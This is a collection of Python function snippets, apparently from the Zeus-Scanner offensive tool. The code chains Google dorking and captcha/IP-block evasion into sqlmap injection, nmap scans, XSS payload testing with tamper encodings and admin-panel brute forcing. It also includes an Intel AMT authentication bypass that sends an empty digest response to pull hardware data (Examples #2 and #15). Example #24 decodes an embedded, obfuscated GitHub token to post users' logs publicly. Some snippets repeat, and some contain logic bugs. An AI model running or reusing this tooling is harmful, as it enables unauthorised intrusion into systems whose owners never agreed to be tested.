Example #1
def main_intel_amt(url, agent=None, proxy=None):
    proxy = proxy_string_to_dict(proxy) or None
    agent = agent or DEFAULT_USER_AGENT
    logger.info(
        set_color(
            "attempting to connect to '{}' and get hardware info...".format(
                url)))
    try:
        json_data = __get_hardware(url, agent=agent, proxy=proxy)
        if json_data is None:
            logger.error(
                set_color("unable to get any information, skipping...",
                          level=40))
        else:
            print("-" * 40)
            for key in json_data.keys():
                print("{}:".format(str(key).capitalize()))
                for item in json_data[key]:
                    print(" - {}: {}".format(item.capitalize(),
                                             json_data[key][item]))
            print("-" * 40)
    except Exception as e:
        if "Temporary failure in name resolution" in str(e):
            logger.error(
                set_color("failed to connect on '{}', skipping...".format(url),
                          level=40))
        else:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue...".format(e)))
            fix_log_file()
            request_issue_creation()
Example #2
def __get_auth_headers(target,
                       port=16992,
                       source=None,
                       agent=None,
                       proxy=None):
    if not source or 'WWW-Authenticate' not in source.headers:
        logger.info(
            set_color(
                "header value not established, attempting to get bypass..."))
        source = requests.get("http://{0}:{1}/index.htm".format(target, port),
                              headers={
                                  'connection': 'close',
                                  'user-agent': agent
                              },
                              proxies=proxy)
        return source
    # Get digest and nonce and return the new header
    if 'WWW-Authenticate' in source.headers:
        logger.info(
            set_color(
                "header value established successfully, attempting authentication..."
            ))
        data = re.compile(
            'Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"'
        ).search(source.headers['WWW-Authenticate'])
        digest = data.group(1)
        nonce = data.group(2)
        return 'Digest username="******", ' \
               'realm="Digest:{0}", nonce="{1}", ' \
               'uri="/index.htm", response="", qop=auth, ' \
               'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
    else:
        logger.info(set_color("nothing found, will skip URL..."))
        return None
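The header returned above leaves response="" empty. For reference, a minimal sketch of how an RFC 2617 digest response for qop=auth could be computed (compute_digest_response, its credentials, and the Python 2 str hashing are assumptions, not part of the original code):

import hashlib

def compute_digest_response(username, password, realm, nonce,
                            uri="/index.htm", method="GET",
                            nc="00000001", cnonce="deadbeef"):
    # RFC 2617, qop=auth: response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    ha1 = hashlib.md5("{}:{}:{}".format(username, realm, password)).hexdigest()
    ha2 = hashlib.md5("{}:{}".format(method, uri)).hexdigest()
    return hashlib.md5("{}:{}:{}:{}:auth:{}".format(
        ha1, nonce, nc, cnonce, ha2)).hexdigest()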
Example #3
def main(url, show=False, verbose=False):
    logger.info(set_color("loading extensions..."))
    extensions = __load_extensions()
    if verbose:
        logger.debug(
            set_color("loaded a total of {} extensions...".format(
                len(extensions)),
                      level=10))
    logger.info(set_color("attempting to bruteforce admin panel..."))
    check_for_admin_page(url, extensions, show_possibles=show, verbose=verbose)
Example #4
    def __run_attacks(
            url, sqlmap=False, nmap=False, intel=False, xss=False,
            verbose=False, admin=False, given_path=None, auto=False, batch=False
    ):
        """
        run the attacks if any are requested
        """
        __enabled_attacks = {
            "sqlmap": opt.runSqliScan,
            "port": opt.runPortScan,
            "xss": opt.runXssScan,
            "admin": opt.adminPanelFinder,
            "intel": opt.intelCheck
        }

        enabled = set()
        for key in __enabled_attacks.keys():
            if __enabled_attacks[key] is True:
                enabled.add(key)
            if len(enabled) > 1:
                logger.error(set_color(
                    "it appears that you have enabled multiple attack types, "
                    "as of now only 1 attack is supported at a time, choose "
                    "your attack and try again. You can use the -f flag if "
                    "you do not want to complete an entire search again...", level=40
                ))
                shutdown()

        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url), opts=["y", "N"]
            )
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(url.strip(), verbose=verbose, opts=__create_arguments(sqlmap=True),
                                                    auto_search=auto, given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address, verbose=verbose, opts=__create_arguments(nmap=True))
            elif intel:
                url = get_true_url(url)
                return intel_me.main_intel_amt(url, agent=agent_to_use, proxy=proxy_to_use)
            elif admin:
                main(url, show=opt.showAllConnections, verbose=verbose)
            elif xss:
                main_xss(url, verbose=verbose, proxy=proxy_to_use, agent=agent_to_use, tamper=opt.tamperXssPayloads)
            else:
                pass
        else:
            logger.warning(set_color(
                "skipping '{}'...".format(url), level=30
            ))
Example #5
def main_xss(start_url, verbose=False, proxy=None, agent=None):
    find_xss_script(start_url)
    logger.info(set_color(
        "loading payloads..."
    ))
    payloads = __load_payloads()
    if verbose:
        logger.debug(set_color(
            "a total of {} payloads loaded...".format(len(payloads)), level=10
        ))
    logger.info(set_color(
        "payloads will be written to a temporary file and read from there..."
    ))
    filename = create_urls(start_url, payloads)
    if verbose:
        logger.debug(set_color(
            "loaded URL's have been saved to '{}'...".format(filename), level=10
        ))
    logger.info(set_color(
        "testing for XSS vulnerabilities on host '{}'...".format(start_url)
    ))
    if proxy is not None:
        logger.info(set_color(
            "using proxy '{}'...".format(proxy)
        ))
    success = set()
    with open(filename) as urls:
        for url in urls.readlines():
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            logger.info(set_color(
                "trying payload '{}'...".format(payload)
            ))
            if result == "sqli":
                # check for the DBMS error string first: "sqli" is truthy and
                # would otherwise fall into the success branch below
                logger.error(set_color(
                    "loaded URL '{}' threw a DBMS error and appears to be SQLi vulnerable, test for SQL injection".format(
                        url
                    ), level=30
                ))
            elif result:
                success.add(url)
                if verbose:
                    logger.debug(set_color(
                        "payload '{}' appears to be usable...".format(payload), level=10
                    ))
            else:
                if verbose:
                    logger.debug(set_color(
                        "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'...".format(
                            start_url, payload
                        ), level=10
                    ))
    create_tree(start_url, list(success))
Example #6
def perform_port_scan(url,
                      ports=None,
                      scanner=NmapHook,
                      verbose=False,
                      opts=None,
                      **kwargs):
    """
    main function that will initialize the port scanning
    """
    url = url.strip()
    logger.info(
        set_color(
            "attempting to find IP address for hostname '{}'...".format(url)))
    found_ip_address = socket.gethostbyname(url)
    logger.info(
        set_color("found IP address for given URL -> '{}'...".format(
            found_ip_address)))
    if verbose:
        logger.debug(set_color("checking for nmap on your system...",
                               level=10))
    nmap_exists = find_nmap(verbose=verbose)
    if nmap_exists:
        if verbose:
            logger.debug(
                set_color(
                    "nmap has been found under '{}'...".format(nmap_exists),
                    level=10))
        logger.info(
            set_color("starting port scan on IP address '{}'...".format(
                found_ip_address)))
        try:
            data = scanner(found_ip_address, ports=ports, opts=opts)
            json_data = data._get_all_info()
            data.show_open_ports(json_data)
            file_path = data.send_to_file(json_data)
            logger.info(
                set_color(
                    "port scan completed, all data saved to JSON file under '{}'..."
                    .format(file_path)))
        except KeyError:
            logger.fatal(
                set_color("no port information found for '{}({})'...".format(
                    url, found_ip_address),
                          level=50))
        except Exception as e:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue quitting...".
                    format(e),
                    level=50))
            request_issue_creation()
    else:
        logger.fatal(
            set_color(
                "nmap was not found on your system, please install it...",
                level=50))
Example #7
    def __run_attacks(url,
                      sqlmap=False,
                      verbose=False,
                      nmap=False,
                      given_path=None,
                      auto=False,
                      batch=False):
        """
        run the attacks if any are requested
        """
        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url),
                opts=["y", "N"])
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(
                    url.strip(),
                    verbose=verbose,
                    opts=__create_sqlmap_arguments(),
                    auto_search=auto,
                    given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address,
                                                   verbose=verbose)
            else:
                pass
        else:
            logger.warning(set_color("skipping '{}'...".format(url)))
Example #8
    def __run_attacks(
            url, sqlmap=False, nmap=False, intel=False, xss=False,
            verbose=False, admin=False, given_path=None, auto=False, batch=False
    ):
        """
        run the attacks if any are requested
        """
        if not batch:
            question = prompt(
                "would you like to process found URL: '{}'".format(url), opts=["y", "N"]
            )
        else:
            question = "y"

        if question.lower().startswith("y"):
            if sqlmap:
                return sqlmap_scan.sqlmap_scan_main(url.strip(), verbose=verbose, opts=__create_arguments(sqlmap=True),
                                                    auto_search=auto, given_path=given_path)
            elif nmap:
                url_ip_address = replace_http(url.strip())
                return nmap_scan.perform_port_scan(url_ip_address, verbose=verbose, opts=__create_arguments(nmap=True))
            elif intel:
                url = get_true_url(url)
                return intel_me.main_intel_amt(url, agent=agent_to_use, proxy=proxy_to_use)
            elif admin:
                main(url, show=opt.showAllConnections, verbose=verbose)
            elif xss:
                main_xss(url, verbose=verbose, proxy=proxy_to_use, agent=agent_to_use, tamper=opt.tamperXssPayloads)
            else:
                pass
        else:
            logger.warning(set_color(
                "skipping '{}'...".format(url), level=30
            ))
Example #9
 def __choose_attack(choice, attacks):
     while True:
         try:
             if int(choice) in range(len(attacks)):
                 return int(choice)
         except ValueError:
             pass
         logger.warning(
             set_color("{} is not a valid choice...".format(choice)))
         # re-prompt so an invalid choice cannot loop forever
         choice = prompt("enter a number between 0 and {}".format(len(attacks) - 1))
Example #10
 def show_open_ports(self, json_data, sep="-" * 30):
     """
     outputs the current scan information
     """
     # have to create a spacer or the output comes out funky..
     spacer_data = {4: " " * 8, 6: " " * 6, 8: " " * 4}
     logger.info(set_color("finding data for IP '{}'...".format(self.ip)))
     json_data = json.loads(json_data)["scan"]
     print(
         "{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
             sep, self.ip,
             json_data[self.ip]["hostnames"][0]["name"],
             json_data[self.ip]["status"]["state"],
             "TCP"
         )
     )
     oports = sorted(json_data[self.ip]["tcp"].keys())
     for port in oports:
         port_status = json_data[self.ip]["tcp"][port]["state"]
         # output the found port information..
         print(
             "Port: {}\tStatus: {}{}Type: {}".format(
                 port, json_data[self.ip]["tcp"][port]["state"],
                 spacer_data[len(port_status)],
                 json_data[self.ip]["tcp"][port]["name"]
             )
         )
     print("{}".format(sep))
Example #11
def __get_hardware(target, agent=None, proxy=None):
    req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
    if req.status_code != 200:
        return None
    logger.info(set_color("connected successfully getting hardware info..."))
    tree = html.fromstring(req.content)
    raw = tree.xpath('//td[@class="r1"]/text()')
    bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
    data = {
        'platform': {
            'model': raw[0],
            'manufacturer': raw[1],
            'version': raw[2],
            'serial': raw[4],
            'system_id': raw[5]
        },
        'baseboard': {
            'manufacturer': raw[6],
            'name': raw[7],
            'version': raw[8],
            'serial': raw[9],
            'tag': raw[10],
            'replaceable': raw[11]
        },
        'bios': {
            'vendor': raw[12],
            'version': raw[13],
            'date': raw[14],
            'functions': bios_functions
        }
    }
    return json.dumps(data)
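The XPath indexing above assumes a fixed page layout with at least 15 td.r1 cells; a defensive guard (illustrative only, not part of the original) would avoid an IndexError when the layout differs:

    raw = tree.xpath('//td[@class="r1"]/text()')
    if len(raw) < 15:
        # page layout differs from what the fixed indexing expects
        return None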
Example #12
    def __run_attacks_main():
        which_log_to_use = {
            "dork": URL_LOG_PATH,
            "spider": SPIDER_LOG_PATH
        }

        options = (opt.useRandomDork, opt.dorkToUse, opt.dorkFileToUse)

        to_use = which_log_to_use["dork"] if any(options) else which_log_to_use["spider"]

        try:
            urls_to_use = get_latest_log_file(to_use)
        except TypeError:
            urls_to_use = None

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks, it appears that no file was created for the retrieved data...", level=40
            ))
            shutdown()
        if opt.runSqliScan or opt.runPortScan or opt.intelCheck or opt.adminPanelFinder or opt.runXssScan:
            with open(urls_to_use) as urls:
                for url in urls.readlines():
                    __run_attacks(
                        url.strip(),
                        sqlmap=opt.runSqliScan, nmap=opt.runPortScan, intel=opt.intelCheck, xss=opt.runXssScan,
                        admin=opt.adminPanelFinder, given_path=opt.givenSearchPath,
                        auto=opt.autoStartSqlmap, verbose=opt.runInVerbose, batch=opt.runInBatch
                    )
Example #13
 def __create_arguments(sqlmap=False, nmap=False):
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     logger.info(set_color(
         "creating arguments for {}...".format("sqlmap" if sqlmap else "nmap")
     ))
     retval = []
     splitter = {"sqlmap": ",", "nmap": "|"}
     if sqlmap:
         if opt.sqlmapArguments is not None:
             for line in opt.sqlmapArguments.split(splitter["sqlmap"]):
                 to_use = line.strip().split(" ")
                 option = (to_use[0], to_use[1])
                 if to_use[0] in SQLMAP_API_OPTIONS:
                     retval.append(option)
                 else:
                     logger.warning(set_color(
                         "option '{}' is not recognized by sqlmap API, skipping...".format(option[0]),
                         level=30
                     ))
     elif nmap:
         warning_msg = "option {} is not known by the nmap api, skipping..."
         if opt.nmapArguments is not None:
             for line in opt.nmapArguments.split(splitter["nmap"]):
                 try:
                     data = line.index(" ")
                 except ValueError:
                     data = None
                 if data is not None:
                     argument = line[0:data]
                     if argument in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(argument), level=30
                         ))
                 else:
                     if line in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(line), level=30
                         ))
     return retval
Example #14
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
                "in otherwise vulnerable sites...",
                level=30))
    return base64.b64encode(payload)
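These snippets target Python 2, where base64.b64encode accepts str; a Python 3 variant would need to encode the payload first (a hedged sketch, not part of the original):

import base64

def tamper_py3(payload, **kwargs):
    # b64encode requires bytes on Python 3; decode back to str for URL use
    return base64.b64encode(payload.encode()).decode()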
Example #15
def __get_raw_data(target, page, agent=None, proxy=None):
    logger.info(set_color("getting raw information..."))
    return requests.get("http://{0}:16992/{1}.htm".format(target, page),
                        headers={
                            'connection': 'close',
                            'Authorization': __get_auth_headers(target),
                            'user-agent': agent
                        },
                        proxies=proxy)
Example #16
def __tamper_warnings(script):
    warn_msg = ""
    if script == "hex":
        warn_msg += "hex tamper script may increase risk of false positives..."
    elif script == " base64":
        warn_msg += "base64 tamper script may increase risk of not finding a vulnerability..."
    else:
        pass
    logger.warning(set_color(warn_msg, level=30))
Example #17
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(set_color(
            "hex tamper scripts may increase the risk of false positives...", level=30
        ))
    retval = hex(hash(payload))
    if "-" in str(retval):
        # strip only the leading minus sign from negative hash values
        return retval[1:]
    else:
        return retval
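A brief usage sketch of this tamper script; note that hash() is version-dependent (and randomized per process on Python 3), so the obfuscated value is only stable within a single Python 2 run:

payload = "<script>alert(1)</script>"  # illustrative sample payload
print(tamper(payload, warning=False))  # a '0x...'-style string derived from hash(payload)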
Example #18
 def __config_search_engine(verbose=False):
     """
     configure the search engine if a one different from google is given
     """
     non_default_msg = "specified to use non-default search engine..."
     if opt.useDDG:
         if verbose:
             logger.debug(set_color(
                 "using DuckDuckGo as the search engine...", level=10
             ))
         logger.info(set_color(
             non_default_msg
         ))
         se = AUTHORIZED_SEARCH_ENGINES["duckduckgo"]
     elif opt.useAOL:
         if verbose:
             logger.debug(set_color(
                 "using AOL as the search engine...", level=10
             ))
         logger.info(set_color(
             non_default_msg
         ))
         se = AUTHORIZED_SEARCH_ENGINES["aol"]
     else:
         if verbose:
             logger.debug(set_color(
                 "using default search engine (Google)...", level=10
             ))
         if opt.fileToEnumerate is None:
             logger.info(set_color(
                 "using default search engine..."
             ))
         se = AUTHORIZED_SEARCH_ENGINES["google"]
     return se
Example #19
 def __extract_stacktrace(file_data):
     logger.info(set_color("extracting traceback from log file..."))
     retval, buff_mode, _buffer = [], False, ""
     with open(file_data, "r+") as log:
         for line in log:
             if "Traceback" in line:
                 buff_mode = True
             if line and len(line) < 5:
                 buff_mode = False
                 retval.append(_buffer)
                 _buffer = ""
             if buff_mode:
                 if len(line) > 400:
                     line = line[:400] + "...\n"
                 _buffer += line
     return "".join(retval)
Example #20
 def show_open_ports(self, json_data, sep="-" * 30):
     """
     outputs the current scan information
     """
     logger.info(set_color("finding data for IP '{}'...".format(self.ip)))
     json_data = json.loads(json_data)["scan"]
     print("{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
         sep, self.ip, json_data[self.ip]["hostnames"][0]["name"],
         json_data[self.ip]["status"]["state"], "TCP"))
     oports = sorted(json_data[self.ip]["tcp"].keys())
     for port in oports:
         print("Port: {}\tStatus: {}\tType: {}".format(
             port, json_data[self.ip]["tcp"][port]["state"],
             json_data[self.ip]["tcp"][port]["name"]))
     print("{}".format(sep))
Example #21
 def __create_sqlmap_arguments():
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     retval = []
     if opt.sqlmapArguments is not None:
         for line in opt.sqlmapArguments.split(","):
             to_use = line.strip().split(" ")
             option = (to_use[0], to_use[1])
             if to_use[0] in SQLMAP_API_OPTIONS:
                 retval.append(option)
             else:
                 logger.warning(
                     set_color(
                         "option '{}' is not recognized by sqlmap API, skipping..."
                         .format(option[0]),
                         level=30))
     return retval
Example #22
def create_urls(url, payload_list, tamper=None):
    tf = tempfile.NamedTemporaryFile(delete=False)
    tf_name = tf.name
    with tf as tmp:
        for i, payload in enumerate(payload_list):
            if tamper:
                try:
                    if i < 1:
                        payload = __tamper_payload(payload, tamper_type=tamper, warning=True)
                    else:
                        payload = __tamper_payload(payload, tamper_type=tamper, warning=False)
                except InvalidTamperProvided:
                    logger.error(set_color(
                        "you provided an invalid tamper script, acceptable tamper scripts are: {}...".format(
                            " | ".join(list_tamper_scripts())
                        ), level=40
                    ))
                    shutdown()
            loaded_url = "{}{}\n".format(url.strip(), payload.strip())
            tmp.write(loaded_url)
    return tf_name
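A short usage sketch of create_urls as defined above; each line of the returned temp file is the target URL with one payload appended (the URL and payloads are illustrative):

payloads = ["<script>alert(1)</script>", "\"><svg/onload=alert(1)>"]
filename = create_urls("http://example.com/search?q=", payloads)
with open(filename) as urls:
    for line in urls:
        print(line.strip())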
Example #23
 def __config_headers():
     """
     configure the request headers, this will configure user agents and proxies
     """
     if opt.proxyConfig is not None:
         proxy = opt.proxyConfig
     elif opt.proxyFileRand is not None:
         if opt.runInVerbose:
             logger.debug(set_color(
                 "loading random proxy from '{}'...".format(opt.proxyFileRand), level=10
             ))
         with open(opt.proxyFileRand) as proxies:
             possible = proxies.readlines()
             proxy = random.choice(possible).strip()
     else:
         proxy = None
     if opt.usePersonalAgent is not None:
         agent = opt.usePersonalAgent
     elif opt.useRandomAgent:
         agent = grab_random_agent(verbose=opt.runInVerbose)
     else:
         agent = None
     return proxy, agent
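proxy_string_to_dict (used in Examples #1 and #29 to turn the string returned here into a requests-style proxies mapping) is not among these snippets; a plausible minimal sketch, assuming the usual scheme://host:port input, would be:

def proxy_string_to_dict(proxy_string):
    # hypothetical sketch: "socks5://127.0.0.1:9050" -> {"socks5": "127.0.0.1:9050"}
    if proxy_string is None:
        return None
    scheme, _, address = proxy_string.partition("://")
    return {scheme: address}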
Example #24
def request_issue_creation():
    question = prompt(
        "would you like to create an anonymous issue and post it to Zeus's Github",
        opts="yN")
    if question.lower().startswith("n"):
        logger.error(
            set_color(
                "Zeus has experienced an internal error and cannot continue, shutting down...",
                level=40))
        shutdown()

    fix_log_file()
    logger.info(
        set_color(
            "Zeus got an unexpected error and will automatically create an issue for this error, please wait..."
        ))

    def __extract_stacktrace(file_data):
        logger.info(set_color("extracting traceback from log file..."))
        retval, buff_mode, _buffer = [], False, ""
        with open(file_data, "r+") as log:
            for line in log:
                if "Traceback" in line:
                    buff_mode = True
                if line and len(line) < 5:
                    buff_mode = False
                    retval.append(_buffer)
                    _buffer = ""
                if buff_mode:
                    if len(line) > 400:
                        line = line[:400] + "...\n"
                    _buffer += line
        return "".join(retval)

    logger.info(set_color("getting authorization..."))

    encoded = __get_encoded_string()
    n = get_decode_num(encoded)
    token = decode(n, encoded)

    current_log_file = get_latest_log_file(CURRENT_LOG_FILE_PATH)
    stacktrace = __extract_stacktrace(current_log_file)
    issue_title = stacktrace.split("\n")[-2]

    issue_data = {
        "title":
        issue_title,
        "body":
        "Zeus version:\n`{}`\n\n"
        "Error info:\n```{}````\n\n"
        "Running details:\n`{}`\n\n"
        "Commands used:\n`{}`\n\n"
        "Log file info:\n```{}```".format(VERSION, str(stacktrace),
                                          str(platform.platform()),
                                          " ".join(sys.argv),
                                          open(current_log_file).read()),
    }

    _json_data = json.dumps(issue_data)
    if sys.version_info > (3, ):
        _json_data = _json_data.encode("utf-8")

    try:
        req = urllib2.Request(
            url="https://api.github.com/repos/ekultek/zeus-scanner/issues",
            data=_json_data,
            headers={"Authorization": "token {}".format(token)})
        urllib2.urlopen(req, timeout=10).read()
        logger.info(
            set_color(
                "issue has been created successfully with the following name '{}'..."
                .format(issue_title)))
    except Exception as e:
        logger.exception(
            set_color("failed to auto create the issue, got exception '{}', "
                      "you may manually create an issue...".format(e),
                      level=50))
Example #25
def main_xss(start_url, verbose=False, proxy=None, agent=None, tamper=None):
    if tamper:
        logger.info(set_color(
            "tampering payloads with '{}'...".format(tamper)
        ))
    find_xss_script(start_url)
    logger.info(set_color(
        "loading payloads..."
    ))
    payloads = __load_payloads()
    if verbose:
        logger.debug(set_color(
            "a total of {} payloads loaded...".format(len(payloads)), level=10
        ))
    logger.info(set_color(
        "payloads will be written to a temporary file and read from there..."
    ))
    filename = create_urls(start_url, payloads, tamper=tamper)
    logger.info(set_color(
        "loaded URL's have been saved to '{}'...".format(filename)
    ))
    logger.info(set_color(
        "testing for XSS vulnerabilities on host '{}'...".format(start_url)
    ))
    if proxy is not None:
        logger.info(set_color(
            "using proxy '{}'...".format(proxy)
        ))
    success = set()
    with open(filename) as urls:
        for i, url in enumerate(urls.readlines(), start=1):
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            if verbose:
                logger.info(set_color(
                    "trying payload '{}'...".format(payload)
                ))
            if result[0] != "sqli" and result[0] is True:
                success.add(url)
                if verbose:
                    logger.debug(set_color(
                        "payload '{}' appears to be usable...".format(payload), level=10
                    ))
            elif result[0] is "sqli":
                if i <= 1:
                    logger.error(set_color(
                        "loaded URL '{}' threw a DBMS error and appears to be injectable, test for SQL injection, "
                        "backend DBMS appears to be '{}'...".format(
                            url, result[1]
                        ), level=40
                    ))
                else:
                    if verbose:
                        logger.error(set_color(
                            "SQL error discovered...", level=40
                        ))
            else:
                if verbose:
                    logger.debug(set_color(
                        "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'...".format(
                            start_url, payload
                        ), level=10
                    ))
    if len(success) != 0:
        logger.info(set_color(
            "possible XSS scripts to be used:"
        ))
        create_tree(start_url, list(success))
    else:
        logger.error(set_color(
            "host '{}' does not appear to be vulnerable to XSS attacks...".format(start_url)
        ))
    save = prompt(
        "would you like to keep the URL's saved for further testing", opts="yN"
    )
    if save.lower().startswith("n"):
        os.remove(filename)
Example #26
def check_for_admin_page(url,
                         exts,
                         protocol="http://",
                         show_possibles=False,
                         verbose=False):
    possible_connections, connections = set(), set()
    stripped_url = replace_http(url.strip())
    for ext in exts:
        ext = ext.strip()
        true_url = "{}{}{}".format(protocol, stripped_url, ext)
        if verbose:
            logger.debug(set_color("trying '{}'...".format(true_url),
                                   level=10))
        try:
            urlopen(true_url, timeout=5)
            logger.info(
                set_color(
                    "connected successfully to '{}'...".format(true_url)))
            connections.add(true_url)
        except HTTPError as e:
            data = str(e).split(" ")
            if verbose:
                if "Access Denied" in str(e):
                    logger.warning(
                        set_color(
                            "got access denied, possible control panel found without external access on '{}'..."
                            .format(true_url),
                            level=30))
                    possible_connections.add(true_url)
                else:
                    logger.error(
                        set_color(
                            "failed to connect got error code {}...".format(
                                data[2]),
                            level=40))
        except Exception as e:
            if verbose:
                if "<urlopen error timed out>" or "timeout: timed out" in str(
                        e):
                    logger.warning(
                        set_color(
                            "connection timed out after five seconds "
                            "assuming won't connect and skipping...",
                            level=30))
                else:
                    logger.exception(
                        set_color(
                            "failed to connect with unexpected error '{}'...".
                            format(str(e)),
                            level=50))
                    fix_log_file()
                    request_issue_creation()
    possible_connections, connections = list(possible_connections), list(
        connections)
    data_msg = "found {} possible connection(s) and {} successful connection(s)..."
    logger.info(
        set_color(data_msg.format(len(possible_connections),
                                  len(connections))))
    if len(connections) != 0:
        logger.info(set_color("creating connection tree..."))
        create_tree(url, connections)
    else:
        logger.fatal(
            set_color(
                "did not find any successful connections to {}'s "
                "admin page".format(url),
                level=50))
    if show_possibles:
        if len(possible_connections) != 0:
            logger.info(set_color("creating possible connection tree..."))
            create_tree(url, possible_connections)
        else:
            logger.fatal(
                set_color(
                    "did not find any possible connections to {}'s "
                    "admin page".format(url),
                    level=50))
Example #27
    if opt.showCurrentVersion:
        print(VERSION_STRING)
        exit(0)

    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.showSqlmapArguments:
        logger.info(set_color(
            "there are a total of {} arguments understood by sqlmap API, "
            "they include:".format(len(SQLMAP_API_OPTIONS))
        ))
        print("\n")
        for arg in SQLMAP_API_OPTIONS:
            print(
                "[*] {}".format(arg)
            )
        print("\n")
        logger.info(set_color(
            "for more information about sqlmap arguments, see here '{}'...".format(
                SQLMAP_MAN_PAGE_URL
            )
        ))
        shutdown()

    if opt.showNmapArgs:
Example #28
def get_urls(query,
             url,
             verbose=False,
             warning=True,
             user_agent=None,
             proxy=None,
             **kwargs):
    """
      Bypass Google captchas and Google API by using selenium-webdriver to gather
      the Google URL. This will open a robot controlled browser window and attempt
      to get a URL from Google that will be used for scraping afterwards.

      Only downside to this method is that your IP and user agent will be visible
      until the application pulls the URL.
    """
    if verbose:
        logger.debug(
            set_color("setting up the virtual display to hide the browser...",
                      level=10))
    ff_display = Display(visible=0, size=(800, 600))
    ff_display.start()
    logger.info(
        set_color(
            "firefox browser display will be hidden while it performs the query..."
        ))
    if warning:
        logger.warning(
            set_color(
                "your web browser will be automated in order for Zeus to successfully "
                "bypass captchas and API calls. this is done in order to grab the URL "
                "from the search and parse the results. please give selenium time to "
                "finish it's task...",
                level=30))
    if verbose:
        logger.debug(
            set_color("running selenium-webdriver and launching browser...",
                      level=10))

    if verbose:
        logger.debug(
            set_color(
                "adjusting selenium-webdriver user-agent to '{}'...".format(
                    user_agent),
                level=10))
    if proxy is not None:
        proxy_type = proxy.keys()
        proxy_to_use = Proxy({
            "proxyType": ProxyType.MANUAL,
            "httpProxy": proxy[proxy_type[0]],
            "ftpProxy": proxy[proxy_type[0]],
            "sslProxy": proxy[proxy_type[0]],
            "noProxy": ""
        })
        if verbose:
            logger.debug(
                set_color("setting selenium proxy to '{}'...".format(
                    ''.join(proxy_type) + "://" + ''.join(proxy.values())),
                          level=10))
    else:
        proxy_to_use = None

    profile = webdriver.FirefoxProfile()
    profile.set_preference("general.useragent.override", user_agent)
    browser = webdriver.Firefox(profile, proxy=proxy_to_use)
    logger.info(set_color("browser will open shortly..."))
    browser.get(url)
    if verbose:
        logger.debug(
            set_color(
                "searching search engine for the 'q' element (search button)...",
                level=10))
    search = browser.find_element_by_name('q')
    logger.info(
        set_color("searching '{}' using query '{}'...".format(url, query)))
    search.send_keys(query)
    search.send_keys(Keys.RETURN)  # hit return after you enter search text
    time.sleep(3)
    if verbose:
        logger.debug(set_color("obtaining URL from selenium..."))
    retval = browser.current_url
    ban_url_schema = ["http://ipv6.google.com", "http://ipv4.google.com"]
    if any(u in retval for u in ban_url_schema):  # if you got IP banned
        logger.warning(
            set_color(
                "it appears that Google is attempting to block your IP address, attempting bypass...",
                level=30))
        try:
            retval = bypass_ip_block(retval)
        except IndexError:
            browser.close()  # stop all the random rogue processes
            ff_display.stop()
            logger.warning(
                set_color(
                    "for now the IP ban bypass will only work for queries that have Google's search syntax "
                    "in them. (IE inurl:, incontext:, incontent:)",
                    level=30))
            raise NotImplementedError(
                "bypass for query '{}' is not implemented yet, try again with a different dork, "
                "or change your IP address...".format(query))
    if verbose:
        logger.debug(
            set_color("found current URL from selenium browser '{}'...".format(
                retval),
                      level=10))
    logger.info(set_color("closing the browser and continuing process.."))
    browser.close()
    ff_display.stop()
    return retval
Example #29
def parse_search_results(query,
                         url,
                         verbose=False,
                         dirname="{}/log/url-log",
                         filename="url-log-{}.log",
                         **kwargs):
    """
      Parse a webpage from Google for URL's with a GET(query) parameter
    """
    # chaining "or" between strings keeps only the first value; use a tuple instead
    exclude = ("google", "webcache", "youtube")

    create_dir(dirname.format(os.getcwd()))
    full_file_path = "{}/{}".format(
        dirname.format(os.getcwd()),
        filename.format(len(os.listdir(dirname.format(os.getcwd()))) + 1))

    def __get_headers():
        # kwargs.get never raises, so no exception handling is needed here
        proxy_string = kwargs.get("proxy")
        user_agent = kwargs.get("agent")
        return proxy_string, user_agent

    if verbose:
        logger.debug(
            set_color("checking for user-agent and proxy configuration...",
                      level=10))
    proxy_string, user_agent = __get_headers()

    if proxy_string is not None:
        proxy_string = proxy_string_to_dict(proxy_string)
    if user_agent is None:
        user_agent = DEFAULT_USER_AGENT

    user_agent_info = "adjusting user-agent header to {}..."
    if user_agent != DEFAULT_USER_AGENT:
        user_agent_info = user_agent_info.format(user_agent.strip())
    else:
        user_agent_info = user_agent_info.format(
            "default user agent '{}'".format(DEFAULT_USER_AGENT))

    proxy_string_info = "setting proxy to {}..."
    if proxy_string is not None:
        proxy_string_info = proxy_string_info.format(
            ''.join(proxy_string.keys()) + "://" +
            ''.join(proxy_string.values()))
    else:
        proxy_string_info = "no proxy configuration detected..."

    headers = {"Connection": "close", "user-agent": user_agent}
